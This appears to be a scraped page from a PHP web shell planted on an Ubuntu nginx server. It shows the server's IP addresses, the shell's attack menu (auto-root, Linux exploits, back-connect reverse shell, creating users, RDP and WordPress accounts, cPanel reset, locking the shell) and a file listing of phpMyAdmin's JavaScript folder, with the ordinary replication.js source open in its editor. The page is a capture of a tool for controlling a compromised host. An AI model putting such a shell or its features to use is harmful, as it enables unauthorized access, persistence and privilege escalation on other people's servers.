Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
phpmyadmin /
js /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
codemirror
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
designer
[ DIR ]
drwxr-xr-x
jqplot
[ DIR ]
drwxr-xr-x
server
[ DIR ]
drwxr-xr-x
setup
[ DIR ]
drwxr-xr-x
table
[ DIR ]
drwxr-xr-x
transformations
[ DIR ]
drwxr-xr-x
ajax.js
29.25
KB
-rw-r--r--
chart.js
16.66
KB
-rw-r--r--
common.js
4.42
KB
-rw-r--r--
config.js
23.5
KB
-rw-r--r--
console.js
48.39
KB
-rw-r--r--
cross_framing_protection.js
405
B
-rw-r--r--
doclinks.js
17.85
KB
-rw-r--r--
drag_drop_import.js
12.14
KB
-rw-r--r--
error_report.js
9.05
KB
-rw-r--r--
export.js
30.6
KB
-rw-r--r--
export_output.js
364
B
-rw-r--r--
functions.js
144.6
KB
-rw-r--r--
gis_data_editor.js
13.26
KB
-rw-r--r--
home.js
5.15
KB
-rw-r--r--
import.js
5.5
KB
-rw-r--r--
indexes.js
26.33
KB
-rw-r--r--
jquery.sortable-table.js
9.27
KB
-rw-r--r--
keyhandler.js
2.01
KB
-rw-r--r--
makegrid.js
79.11
KB
-rw-r--r--
menu_resizer.js
5.59
KB
-rw-r--r--
multi_column_sort.js
1.25
KB
-rw-r--r--
name-conflict-fixes.js
43
B
-rw-r--r--
navigation.js
50.62
KB
-rw-r--r--
normalization.js
23.54
KB
-rw-r--r--
ol.js
1.41
KB
-rw-r--r--
page_settings.js
1.78
KB
-rw-r--r--
replication.js
3.46
KB
-rw-r--r--
shortcuts_handler.js
3.23
KB
-rw-r--r--
sql.js
34.71
KB
-rw-r--r--
u2f.js
2.87
KB
-rw-r--r--
webauthn.js
3.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : replication.js
/** * @fileoverview Javascript functions used in server replication page * @name Server Replication * * @requires jQuery * @requires jQueryUI * @requires js/functions.js */ var randomServerId = Math.floor(Math.random() * 10000000); var confPrefix = 'server-id=' + randomServerId + '\nlog_bin=mysql-bin\nlog_error=mysql-bin.err\n'; function updateConfig() { var confIgnore = 'binlog_ignore_db='; var confDo = 'binlog_do_db='; var databaseList = ''; if ($('#db_select option:selected').length === 0) { $('#rep').text(confPrefix); } else if ($('#db_type option:selected').val() === 'all') { $('#db_select option:selected').each(function () { databaseList += confIgnore + $(this).val() + '\n'; }); $('#rep').text(confPrefix + databaseList); } else { $('#db_select option:selected').each(function () { databaseList += confDo + $(this).val() + '\n'; }); $('#rep').text(confPrefix + databaseList); } } /** * Unbind all event handlers before tearing down a page */ AJAX.registerTeardown('replication.js', function () { $('#db_type').off('change'); $('#db_select').off('change'); $('#primary_status_href').off('click'); $('#primary_replicas_href').off('click'); $('#replica_status_href').off('click'); $('#replica_control_href').off('click'); $('#replica_errormanagement_href').off('click'); $('#replica_synchronization_href').off('click'); $('#db_reset_href').off('click'); $('#db_select_href').off('click'); $('#reset_replica').off('click'); }); AJAX.registerOnload('replication.js', function () { $('#rep').text(confPrefix); $('#db_type').on('change', updateConfig); $('#db_select').on('change', updateConfig); $('#primary_status_href').on('click', function () { $('#replication_primary_section').toggle(); }); $('#primary_replicas_href').on('click', function () { $('#replication_replicas_section').toggle(); }); $('#replica_status_href').on('click', function () { $('#replication_replica_section').toggle(); }); $('#replica_control_href').on('click', function () { $('#replica_control_gui').toggle(); }); $('#replica_errormanagement_href').on('click', function () { $('#replica_errormanagement_gui').toggle(); }); $('#replica_synchronization_href').on('click', function () { $('#replica_synchronization_gui').toggle(); }); $('#db_reset_href').on('click', function () { $('#db_select option:selected').prop('selected', false); $('#db_select').trigger('change'); }); $('#db_select_href').on('click', function () { $('#db_select option').prop('selected', true); $('#db_select').trigger('change'); }); $('#reset_replica').on('click', function (e) { e.preventDefault(); var $anchor = $(this); var question = Messages.strResetReplicaWarning; $anchor.confirm(question, $anchor.attr('href'), function (url) { Functions.ajaxShowMessage(); AJAX.source = $anchor; var params = Functions.getJsConfirmCommonParam({ 'ajax_page_request': true, 'ajax_request': true }, $anchor.getPostData()); $.post(url, params, AJAX.responseHandler); }); }); $('#button_generate_password').on('click', function () { Functions.suggestPassword(this.form); }); $('#nopass_1').on('click', function () { this.form.pma_pw.value = ''; this.form.pma_pw2.value = ''; this.checked = true; }); $('#nopass_0').on('click', function () { document.getElementById('text_pma_change_pw').focus(); }); });
Close